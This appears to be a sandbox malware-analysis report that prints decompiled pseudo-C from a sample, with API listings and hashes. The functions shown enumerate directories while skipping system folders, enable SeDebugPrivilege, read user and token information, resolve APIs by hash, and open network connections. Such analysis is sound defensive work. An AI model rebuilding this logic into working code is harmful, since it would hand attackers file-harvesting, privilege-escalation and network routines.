                        				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                        				if(_t102 == 0) {
                        					L14:
                        					_t100 = 0x2e;
                        					goto L15;
                        				}
                        				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                        				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                        				_t74 = _t52;
                        				if(_t74 == 0xffffffff) {
                        					L13:
                        					E00402BAB(_t102);
                        					_t72 = 0;
                        					goto L14;
                        				} else {
                        					goto L3;
                        				}
                        				do {
                        					L3:
                        					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                        						goto L11;
                        					}
                        					if(_a24 == 0) {
                        						L7:
                        						if(E00405D24( &(_v596.cFileName)) >= 3) {
                        							L9:
                        							_push( &(_v596.cFileName));
                        							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                        							_t103 = _t103 + 0xc;
                        							_a16 = _t60;
                        							_t115 = _t60;
                        							if(_t60 == 0) {
                        								goto L11;
                        							}
                        							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                        							E00402BAB(_a16);
                        							_t103 = _t103 + 0x1c;
                        							if(_t99 != 0) {
                        								E00402BAB(_t102);
                        								E00403BEF(_t74);
                        								return _t99;
                        							}
                        							goto L11;
                        						}
                        						_t66 = 0x2e;
                        						_t114 = _v596.cFileName - _t66;
                        						if(_v596.cFileName == _t66) {
                        							goto L11;
                        						}
                        						goto L9;
                        					}
                        					_push(L"Windows");
                        					if(E00405EFF( &(_v596.cFileName)) != 0) {
                        						goto L11;
                        					}
                        					_push(L"Program Files");
                        					if(E00405EFF( &(_v596.cFileName)) != 0) {
                        						goto L11;
                        					}
                        					goto L7;
                        					L11:
                        					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                        					_t56 = FindNextFileW(_t74,  &_v596); // executed
                        				} while (_t56 != 0);
                        				E00403BEF(_t74); // executed
                        				goto L13;
                        			}





















                        0x00403d82
                        0x00403d88
                        0x00403d8c
                        0x00403d8d
                        0x00403d90
                        0x00403ea9
                        0x00403ea9
                        0x00403eb9
                        0x00403ebb
                        0x00403ec0
                        0x00403f95
                        0x00403f95
                        0x00000000
                        0x00403f95
                        0x00403ece
                        0x00403edb
                        0x00403edd
                        0x00403ee2
                        0x00403f8e
                        0x00403f8f
                        0x00000000
                        0x00403f94
                        0x00000000
                        0x00403ee8
                        0x00403ef8
                        0x00403f0a
                        0x00403f12
                        0x00403f18
                        0x00403f21
                        0x00403f26
                        0x00403f28
                        0x00403f2d
                        0x00000000
                        0x00000000
                        0x00403f33
                        0x00403f76
                        0x00403f7c
                        0x00000000
                        0x00403f83
                        0x00403f36
                        0x00403f3a
                        0x00000000
                        0x00403f40
                        0x00403f0c
                        0x00403f10
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403f41
                        0x00403f41
                        0x00403f4b
                        0x00403f58
                        0x00403f5c
                        0x00403f88
                        0x00000000
                        0x00403f8d
                        0x00403f60
                        0x00000000
                        0x00403f60
                        0x00403ef8
                        0x00403ee8
                        0x00403da3
                        0x00403da9
                        0x00403ea6
                        0x00403ea8
                        0x00000000
                        0x00403ea8
                        0x00403db7
                        0x00403dc4
                        0x00403dc6
                        0x00403dcb
                        0x00403e9d
                        0x00403e9e
                        0x00403ea4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403dd1
                        0x00403dd1
                        0x00403dd8
                        0x00000000
                        0x00000000
                        0x00403de2
                        0x00403e12
                        0x00403e22
                        0x00403e30
                        0x00403e36
                        0x00403e3f
                        0x00403e44
                        0x00403e47
                        0x00403e4a
                        0x00403e4c
                        0x00000000
                        0x00000000
                        0x00403e63
                        0x00403e65
                        0x00403e6a
                        0x00403e6f
                        0x00403f64
                        0x00403f6a
                        0x00000000
                        0x00403f71
                        0x00000000
                        0x00403e6f
                        0x00403e26
                        0x00403e27
                        0x00403e2e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403e2e
                        0x00403dea
                        0x00403df9
                        0x00000000
                        0x00000000
                        0x00403e01
                        0x00403e10
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403e75
                        0x00403e7f
                        0x00403e8c
                        0x00403e8e
                        0x00403e97
                        0x00000000

                        APIs
                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                        • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                        • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$FirstNext
                        • String ID: %s\%s$%s\*$Program Files$Windows
                        • API String ID: 1690352074-2009209621
                        • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                        • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                        • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                        • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                        				void* _v8;
                        				struct _LUID _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				struct _TOKEN_PRIVILEGES _v32;
                        				intOrPtr* _t13;
                        				void* _t14;
                        				int _t16;
                        				int _t31;
                        				void* _t32;
                        
                        				_t31 = 0;
                        				E004060AC();
                        				_t32 = __eax;
                        				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                        				_t14 =  *_t13(_t32, 0x28,  &_v8);
                        				if(_t14 != 0) {
                        					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                        					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                        					if(_t16 != 0) {
                        						_push(__ebx);
                        						_v32.Privileges = _v16.LowPart;
                        						_v32.PrivilegeCount = 1;
                        						_v24 = _v16.HighPart;
                        						_v20 = 2;
                        						E004031E5(1, 9, 0xc1642df2, 0, 0);
                        						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                        						_t31 =  !=  ? 1 : 0;
                        					}
                        					E00403C40(_v8);
                        					return _t31;
                        				}
                        				return _t14;
                        			}













                        0x00406512
                        0x00406514
                        0x00406522
                        0x00406524
                        0x00406530
                        0x00406534
                        0x0040653f
                        0x0040654e
                        0x00406552
                        0x0040655a
                        0x0040655f
                        0x0040656d
                        0x00406570
                        0x00406573
                        0x0040657a
                        0x00406589
                        0x0040658d
                        0x00406590
                        0x00406594
                        0x00000000
                        0x0040659a
                        0x004065a1

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                        • String ID: SeDebugPrivilege
                        • API String ID: 3615134276-2896544425
                        • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                        • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                        • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                        • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00402B7C(long _a4) {
                        				void* _t4;
                        				void* _t7;
                        
                        				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                        				_t7 = _t4;
                        				if(_t7 != 0) {
                        					E00402B4E(_t7, 0, _a4);
                        				}
                        				return _t7;
                        			}





                        0x00402b8c
                        0x00402b92
                        0x00402b96
                        0x00402b9e
                        0x00402ba3
                        0x00402baa

                        APIs
                        • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                        • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                        • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                        • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406069(WCHAR* _a4, DWORD* _a8) {
                        				int _t4;
                        				void* _t5;
                        
                        				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                        				_t4 = GetUserNameW(_a4, _a8); // executed
                        				return _t4;
                        			}





                        0x00406077
                        0x00406082
                        0x00406085

                        APIs
                        • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                        • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                        • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                        • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: recv
                        • String ID:
                        • API String ID: 1507349165-0
                        • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                        • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                        • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                        • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 265 4061c3-4061f2 call 402bf2 call 4031e5 271 4061f4-4061ff GetLastError 265->271 272 40622a-40623b call 402b7c 265->272 274 406201-406203 271->274 275 406208-406228 call 4060ac call 4031e5 271->275 279 40624c-406258 call 402b7c 272->279 280 40623d-406249 call 40338c 272->280 277 406329-40632e 274->277 275->272 275->274 288 406269-406290 call 4031e5 GetTokenInformation 279->288 289 40625a-406266 call 40338c 279->289 280->279 295 406292-4062a0 call 402b7c 288->295 296 4062fe-406302 288->296 289->288 295->296 304 4062a2-4062b9 call 406086 295->304 298 406304-406307 call 403c40 296->298 299 40630d-40630f 296->299 305 40630c 298->305 302 406311-406317 call 402bab 299->302 303 406318-40631e 299->303 302->303 307 406320-406326 call 402bab 303->307 308 406327 303->308 314 4062f5-4062fd call 402bab 304->314 315 4062bb-4062df call 4031e5 304->315 305->299 307->308 308->277 314->296 320 4062e2-4062e4 315->320 320->314 321 4062e6-4062f3 call 405b6f 320->321 321->314
                        C-Code - Quality: 75%
                        			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                        				int _v8;
                        				long _v12;
                        				int _v16;
                        				int _v20;
                        				char _v24;
                        				char _v28;
                        				char _v32;
                        				intOrPtr* _t25;
                        				int _t27;
                        				int _t30;
                        				int _t31;
                        				int _t36;
                        				int _t37;
                        				intOrPtr* _t39;
                        				int _t40;
                        				long _t44;
                        				intOrPtr* _t45;
                        				int _t46;
                        				void* _t48;
                        				int _t49;
                        				void* _t67;
                        				void* _t68;
                        				void* _t74;
                        
                        				_t48 = __ebx;
                        				_t67 = 0;
                        				_v8 = 0;
                        				E00402BF2();
                        				_t68 = __eax;
                        				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                        				_t2 =  &_v8; // 0x414449
                        				_push(1);
                        				_push(8);
                        				_push(_t68);
                        				if( *_t25() != 0) {
                        					L4:
                        					_t27 = E00402B7C(0x208);
                        					_v20 = _t27;
                        					__eflags = _t27;
                        					if(_t27 != 0) {
                        						E0040338C(_t27, _t67, 0x104);
                        						_t74 = _t74 + 0xc;
                        					}
                        					_push(_t48);
                        					_t49 = E00402B7C(0x208);
                        					__eflags = _t49;
                        					if(_t49 != 0) {
                        						E0040338C(_t49, _t67, 0x104);
                        						_t74 = _t74 + 0xc;
                        					}
                        					_v28 = 0x208;
                        					_v24 = 0x208;
                        					_t7 =  &_v8; // 0x414449
                        					_v12 = _t67;
                        					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                        					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                        					__eflags = _t30;
                        					if(_t30 == 0) {
                        						_t36 = E00402B7C(_v12);
                        						_v16 = _t36;
                        						__eflags = _t36;
                        						if(_t36 != 0) {
                        							_t14 =  &_v8; // 0x414449, executed
                        							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                        							__eflags = _t37;
                        							if(_t37 != 0) {
                        								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                        								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                        								__eflags = _t40;
                        								if(__eflags != 0) {
                        									_t67 = E00405B6F(__eflags, L"%s", _t49);
                        								}
                        							}
                        							E00402BAB(_v16);
                        						}
                        					}
                        					__eflags = _v8;
                        					if(_v8 != 0) {
                        						E00403C40(_v8); // executed
                        					}
                        					__eflags = _t49;
                        					if(_t49 != 0) {
                        						E00402BAB(_t49);
                        					}
                        					_t31 = _v20;
                        					__eflags = _t31;
                        					if(_t31 != 0) {
                        						E00402BAB(_t31);
                        					}
                        					return _t67;
                        				}
                        				_t44 = GetLastError();
                        				if(_t44 == 0x3f0) {
                        					E004060AC();
                        					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                        					_t3 =  &_v8; // 0x414449
                        					_t46 =  *_t45(_t44, 8, _t3);
                        					__eflags = _t46;
                        					if(_t46 == 0) {
                        						goto L2;
                        					}
                        					goto L4;
                        				}
                        				L2:
                        				return 0;
                        			}


























                        0x004061c3
                        0x004061cb
                        0x004061cd
                        0x004061d0
                        0x004061de
                        0x004061e0
                        0x004061e5
                        0x004061e9
                        0x004061eb
                        0x004061ed
                        0x004061f2
                        0x0040622a
                        0x00406230
                        0x00406235
                        0x00406239
                        0x0040623b
                        0x00406244
                        0x00406249
                        0x00406249
                        0x0040624c
                        0x00406253
                        0x00406256
                        0x00406258
                        0x00406261
                        0x00406266
                        0x00406266
                        0x00406270
                        0x00406273
                        0x00406276
                        0x0040627b
                        0x0040627e
                        0x0040628c
                        0x0040628e
                        0x00406290
                        0x00406295
                        0x0040629a
                        0x0040629e
                        0x004062a0
                        0x004062ac
                        0x004062af
                        0x004062b7
                        0x004062b9
                        0x004062c9
                        0x004062e0
                        0x004062e2
                        0x004062e4
                        0x004062f3
                        0x004062f3
                        0x004062e4
                        0x004062f8
                        0x004062fd
                        0x004062a0
                        0x004062fe
                        0x00406302
                        0x00406307
                        0x0040630c
                        0x0040630d
                        0x0040630f
                        0x00406312
                        0x00406317
                        0x00406318
                        0x0040631c
                        0x0040631e
                        0x00406321
                        0x00406326
                        0x00000000
                        0x00406327
                        0x004061f4
                        0x004061ff
                        0x00406208
                        0x00406218
                        0x0040621d
                        0x00406224
                        0x00406226
                        0x00406228
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406228
                        0x00406201
                        0x00000000

                        APIs
                        • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                        • _wmemset.LIBCMT ref: 00406244
                        • _wmemset.LIBCMT ref: 00406261
                        • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: _wmemset$ErrorInformationLastToken
                        • String ID: IDA$IDA
                        • API String ID: 487585393-2020647798
                        • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                        • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                        • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                        • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 578 404e17-404e57 getaddrinfo 579 404e59-404e5b 578->579 580 404e5d-404e84 call 402b7c socket 578->580 581 404ecf-404ed3 579->581 584 404e86-404e96 call 402bab freeaddrinfo 580->584 585 404e98-404ea7 connect 580->585 593 404ec7-404ec9 584->593 586 404eb3-404ebe freeaddrinfo 585->586 587 404ea9-404eb1 call 404de5 585->587 590 404ec0-404ec6 call 402bab 586->590 591 404ecb 586->591 587->586 590->593 596 404ecd-404ece 591->596 593->596 596->581
                        C-Code - Quality: 37%
                        			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				void _v40;
                        				void* _t23;
                        				signed int _t24;
                        				signed int* _t25;
                        				signed int _t30;
                        				signed int _t31;
                        				signed int _t33;
                        				signed int _t41;
                        				void* _t42;
                        				signed int* _t43;
                        
                        				_v8 = _v8 & 0x00000000;
                        				_t33 = 8;
                        				memset( &_v40, 0, _t33 << 2);
                        				_v32 = 1;
                        				_t23 =  &_v40;
                        				_v28 = 6;
                        				_v36 = 2;
                        				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                        				if(_t23 == 0) {
                        					_t24 = E00402B7C(4);
                        					_t43 = _t24;
                        					_t31 = _t30 | 0xffffffff;
                        					 *_t43 = _t31;
                        					_t41 = _v8;
                        					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                        					 *_t43 = _t24;
                        					if(_t24 != _t31) {
                        						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                        						if(_t24 == _t31) {
                        							E00404DE5(_t24,  *_t43);
                        							 *_t43 = _t31;
                        						}
                        						__imp__freeaddrinfo(_v8);
                        						if( *_t43 != _t31) {
                        							_t25 = _t43;
                        							goto L10;
                        						} else {
                        							E00402BAB(_t43);
                        							L8:
                        							_t25 = 0;
                        							L10:
                        							return _t25;
                        						}
                        					}
                        					E00402BAB(_t43);
                        					__imp__freeaddrinfo(_v8);
                        					goto L8;
                        				}
                        				return 0;
                        			}

















                        0x00404e1d
                        0x00404e26
                        0x00404e2a
                        0x00404e2f
                        0x00404e37
                        0x00404e3a
                        0x00404e45
                        0x00404e4f
                        0x00404e57
                        0x00404e61
                        0x00404e66
                        0x00404e68
                        0x00404e6c
                        0x00404e6e
                        0x00404e7a
                        0x00404e80
                        0x00404e84
                        0x00404e9f
                        0x00404ea7
                        0x00404eab
                        0x00404eb1
                        0x00404eb1
                        0x00404eb6
                        0x00404ebe
                        0x00404ecb
                        0x00000000
                        0x00404ec0
                        0x00404ec1
                        0x00404ec7
                        0x00404ec7
                        0x00404ecd
                        0x00000000
                        0x00404ece
                        0x00404ebe
                        0x00404e87
                        0x00404e90
                        0x00000000
                        0x00404e90
                        0x00000000

                        APIs
                        • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                        • socket.WS2_32(?,?,?), ref: 00404E7A
                        • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: freeaddrinfogetaddrinfosocket
                        • String ID:
                        • API String ID: 2479546573-0
                        • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                        • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                        • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                        • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 598 4040bb-4040f2 call 4031e5 CreateFileW 601 4040f8-404111 call 4031e5 598->601 602 40418d-404190 598->602 612 404113-404119 601->612 613 40417a 601->613 603 404192-4041a7 call 403c90 602->603 604 404184 602->604 603->604 611 4041a9-4041b8 call 403c59 603->611 606 404186-40418c 604->606 621 4041ba-4041d8 call 4040bb call 403d44 611->621 622 4041db-4041e4 call 402bab 611->622 612->613 616 40411b-404120 612->616 615 40417d-40417e call 403c40 613->615 623 404183 615->623 619 404122 616->619 620 404124-404140 call 4031e5 VirtualAlloc 616->620 619->620 620->613 630 404142-40415e call 4031e5 ReadFile 620->630 621->622 622->606 623->604 630->615 635 404160-404178 call 4031e5 630->635 635->615
                        C-Code - Quality: 74%
                        			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                        				struct _SECURITY_ATTRIBUTES* _v8;
                        				char _v12;
                        				long _v16;
                        				void* __ebx;
                        				void* __edi;
                        				void* _t16;
                        				intOrPtr* _t25;
                        				long* _t28;
                        				void* _t30;
                        				int _t32;
                        				intOrPtr* _t33;
                        				void* _t35;
                        				void* _t42;
                        				intOrPtr _t43;
                        				long _t44;
                        				struct _OVERLAPPED* _t46;
                        
                        				_t46 = 0;
                        				_t35 = 0;
                        				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                        				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                        				_t42 = _t16;
                        				_v8 = _t42;
                        				if(_t42 == 0xffffffff) {
                        					__eflags = _a12;
                        					if(_a12 == 0) {
                        						L10:
                        						return _t35;
                        					}
                        					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                        					__eflags = _t43;
                        					if(_t43 == 0) {
                        						goto L10;
                        					}
                        					_push(0);
                        					__eflags = E00403C59(_a4, _t43);
                        					if(__eflags != 0) {
                        						_v8 = 0;
                        						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                        						_push(_t43);
                        						 *_a8 = _v8;
                        						E00403D44();
                        					}
                        					E00402BAB(_t43);
                        					return _t46;
                        				}
                        				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                        				_t44 =  *_t25(_t42,  &_v12);
                        				if(_v12 != 0 || _t44 > 0x40000000) {
                        					L8:
                        					_t45 = _v8;
                        					goto L9;
                        				} else {
                        					_t28 = _a8;
                        					if(_t28 != 0) {
                        						 *_t28 = _t44;
                        					}
                        					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                        					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                        					_t35 = _t30;
                        					if(_t35 == 0) {
                        						goto L8;
                        					} else {
                        						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                        						_t45 = _v8;
                        						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                        						if(_t32 == 0) {
                        							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                        							 *_t33(_t35, _t46, 0x8000);
                        							_t35 = _t46;
                        						}
                        						L9:
                        						E00403C40(_t45); // executed
                        						goto L10;
                        					}
                        				}
                        			}



















                        0x004040c4
                        0x004040ce
                        0x004040d0
                        0x004040e8
                        0x004040ea
                        0x004040ec
                        0x004040f2
                        0x0040418d
                        0x00404190
                        0x00404184
                        0x00000000
                        0x00404184
                        0x004041a0
                        0x004041a5
                        0x004041a7
                        0x00000000
                        0x00000000
                        0x004041a9
                        0x004041b6
                        0x004041b8
                        0x004041be
                        0x004041cb
                        0x004041d0
                        0x004041d1
                        0x004041d3
                        0x004041d8
                        0x004041dc
                        0x00000000
                        0x004041e2
                        0x00404100
                        0x0040410c
                        0x00404111
                        0x0040417a
                        0x0040417a
                        0x00000000
                        0x0040411b
                        0x0040411b
                        0x00404120
                        0x00404122
                        0x00404122
                        0x0040412c
                        0x0040413a
                        0x0040413c
                        0x00404140
                        0x00000000
                        0x00404142
                        0x0040414a
                        0x00404155
                        0x0040415a
                        0x0040415e
                        0x00404168
                        0x00404174
                        0x00404176
                        0x00404176
                        0x0040417d
                        0x0040417e
                        0x00000000
